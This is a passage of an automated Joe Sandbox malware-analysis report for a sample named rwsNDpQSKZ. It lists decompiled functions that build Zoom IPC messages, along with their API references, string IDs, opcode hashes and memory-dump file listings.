                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: JsCallID$com.zoom.app.cci.ccivideo.cancelinvitebyphone.request
                • API String ID: 3166440930-2625813029
                • Opcode ID: aa7b33d3e76518573d616126a27d1e10c3389926334c088bb176532897da4b61
                • Instruction ID: d40b78427ef8da5310376395e9e890281b4818e5d91bdeea571242d29ca0d01d
                • Opcode Fuzzy Hash: aa7b33d3e76518573d616126a27d1e10c3389926334c088bb176532897da4b61
                • Instruction Fuzzy Hash: 2EE0DFB0A003C0A7D720AB51DC46B2E6AB4EB90B56F404A6CB2095B3D2CBF68984C775
                Function 00C6A800 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6A807
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.app.pt.notifyReceivedAppSelected,00002731,Ack,00000004), ref: 00C6A822
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Ack$com.Zoom.app.pt.notifyReceivedAppSelected
                • API String ID: 3166440930-4288858343
                • Opcode ID: c21d55cd5bf65f64b6ba02505c94cb77c71331ad1e73341a772ee6b4e6e8240d
                • Instruction ID: 30c6f93de05fab91f62358fa51e30294ab64fd5dad6138bac56cc493d7108966
                • Opcode Fuzzy Hash: c21d55cd5bf65f64b6ba02505c94cb77c71331ad1e73341a772ee6b4e6e8240d
                • Instruction Fuzzy Hash: 62E0D8B490038097D720AB105C89B1E67B4DB94716F54042CB6055F3D2CBF84984D774
                Function 00C6C830 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C837
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.pt.process.id.notification,00009D09,ProcessID,00000004), ref: 00C6C852
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: ProcessID$com.zoom.app.assistant.pt.process.id.notification
                • API String ID: 4281283084-2779137744
                • Opcode ID: ec0303b1c5cd081d91fe1d00f3348e2503f5673c867bda3c4defdcef00788cee
                • Instruction ID: d45e9c616571c38380e7283c06ac65c8c850abe3e8f83964ca7e9c51b87bcff3
                • Opcode Fuzzy Hash: ec0303b1c5cd081d91fe1d00f3348e2503f5673c867bda3c4defdcef00788cee
                • Instruction Fuzzy Hash: 9CE0D8B0A1434067C3307B144C5571E26A49B90B15F500429B1415B3D2DBF48844EBB6
                Function 00C72990 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C72997
                • ??0?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.cci.ccivideo.setdomain.request,00009E8E,Domain,00000004), ref: 00C729B2
                  • Part of subcall function 00C5D860: __EH_prolog3.LIBCMT ref: 00C5D867
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: Domain$com.zoom.app.cci.ccivideo.setdomain.request
                • API String ID: 3166440930-4034010316
                • Opcode ID: be3def2c18f53bea3e1de4f978ea9b6fc44d926445ea11555b67680be3fa6a35
                • Instruction ID: 13540477c5dea676653b10a431ebf89b8a805851d30bc9edd34780b72970eae0
                • Opcode Fuzzy Hash: be3def2c18f53bea3e1de4f978ea9b6fc44d926445ea11555b67680be3fa6a35
                • Instruction Fuzzy Hash: EAE0D8B0A003C4A7C7106B519C45B1F66A49F44726F04452CB2055F3D2CBF44884DBB4
                Function 00C769A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C769A7
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.ps.cancel.download.component,00013888,componentType,00000004), ref: 00C769C2
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.ps.cancel.download.component$componentType
                • API String ID: 4281283084-2242886927
                • Opcode ID: 3f43cca50bdf2bd656549742780f9448e3e6654dc34d8c715cb2a1a5f339e578
                • Instruction ID: e74626fa1b939be79d08e9ebfe269559c80da787de9123e61457c810f90f852e
                • Opcode Fuzzy Hash: 3f43cca50bdf2bd656549742780f9448e3e6654dc34d8c715cb2a1a5f339e578
                • Instruction Fuzzy Hash: 01E0D8B1A4078067D7207B149C4A75E66A4AB50B16F90096CF2055B3C2CFF44941EB78
                Function 00C6C9B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C6C9B7
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.assistant.audio.configure.request,00009C5F,jsonValue,00000004), ref: 00C6C9D2
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.assistant.audio.configure.request$jsonValue
                • API String ID: 3166440930-816642334
                • Opcode ID: 23d915346cf3fb91cdee7da55f2bb712c821c664a8bc35873f9e64368e62b76c
                • Instruction ID: ff825e0b920b616bcd8c776df4d892bc610b77fa619e05fa880020e47cf61d33
                • Opcode Fuzzy Hash: 23d915346cf3fb91cdee7da55f2bb712c821c664a8bc35873f9e64368e62b76c
                • Instruction Fuzzy Hash: CBE0D8B4A0038067D720BB104C55B1E7AB4F740715F44061CF3015B393CBF48984DBB4
                Function 00C76940 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C76947
                • ??0?$CmmMessageTemplate_1@I@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.Zoom.ps.start.download.component,00013887,componentType,00000004), ref: 00C76962
                  • Part of subcall function 00C5D540: __EH_prolog3.LIBCMT ref: 00C5D547
                  • Part of subcall function 00C8710B: __EH_prolog3_GS.LIBCMT ref: 00C87112
                  • Part of subcall function 00C8710B: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8712F
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting,00002722,Param,00000004), ref: 00C8715D
                  • Part of subcall function 00C8710B: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting,Param,com.Zoom.app.conf.notifyEndSetting), ref: 00C8719D
                  • Part of subcall function 00C8710B: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C68F5D,com.Zoom.app.conf.notifyEndSetting), ref: 00C871CC
                  • Part of subcall function 00C8710B: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C8721F
                  • Part of subcall function 00C8710B: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C8723C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@$CriticalH_prolog3PackageSectionStringTree@$EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.Zoom.ps.start.download.component$componentType
                • API String ID: 4281283084-2386146565
                • Opcode ID: 5b6bd6de0be6eba5d80a3d697416ca3eec697899f4e2464de4ba4e7d38125cd4
                • Instruction ID: 5c7f04689043f5fd957ef33c3e94a5fa858e7f0df4d5c93efe2b0e9054f6f4ff
                • Opcode Fuzzy Hash: 5b6bd6de0be6eba5d80a3d697416ca3eec697899f4e2464de4ba4e7d38125cd4
                • Instruction Fuzzy Hash: 9AE0D8F0A4078067C721BB144C4975E76A4AB90716F50066CF1455B392DBF84940D774
                Function 00C5C950 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5C957
                • ??0?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAE@PBDH0@Z.RWSNDPQSKZ(com.zoom.app.mapi.outlook.on.get.mapi.calendar.events.notify,00009E6B,outJsonEvents,00000004), ref: 00C5C972
                  • Part of subcall function 00C5D270: __EH_prolog3.LIBCMT ref: 00C5D277
                  • Part of subcall function 00C5D3E7: __EH_prolog3_GS.LIBCMT ref: 00C5D3EE
                  • Part of subcall function 00C5D3E7: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D40B
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events,00009E6A,strJsonEvents,00000004), ref: 00C5D439
                  • Part of subcall function 00C5D3E7: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events,strJsonEvents,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D479
                  • Part of subcall function 00C5D3E7: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048,00C5C91D,com.zoom.app.mapi.outlook.get.mapi.calendar.events), ref: 00C5D4A8
                  • Part of subcall function 00C5D3E7: EnterCriticalSection.KERNEL32(?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?,00000048), ref: 00C5D4FB
                  • Part of subcall function 00C5D3E7: LeaveCriticalSection.KERNEL32(?,?,?,-00000004,?,?,?,?,?,?,?,?,?,?,-00000004,?), ref: 00C5D518
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$??0?$ArchiveArchive@String$CriticalH_prolog3PackageSectionTree@$Cmm@@@EnterH_prolog3_LeaveMessageNode@23@Root@Template_1@Tree
                • String ID: com.zoom.app.mapi.outlook.on.get.mapi.calendar.events.notify$outJsonEvents
                • API String ID: 3166440930-3677924241
                • Opcode ID: 9904add54b2faad13db9b8616c4596b9196c698efbcca062342b9c1e9653a599
                • Instruction ID: a0c22731927d5f55345c5668909ef62e4da174566bea73e2a1e5f1e321368b91
                • Opcode Fuzzy Hash: 9904add54b2faad13db9b8616c4596b9196c698efbcca062342b9c1e9653a599
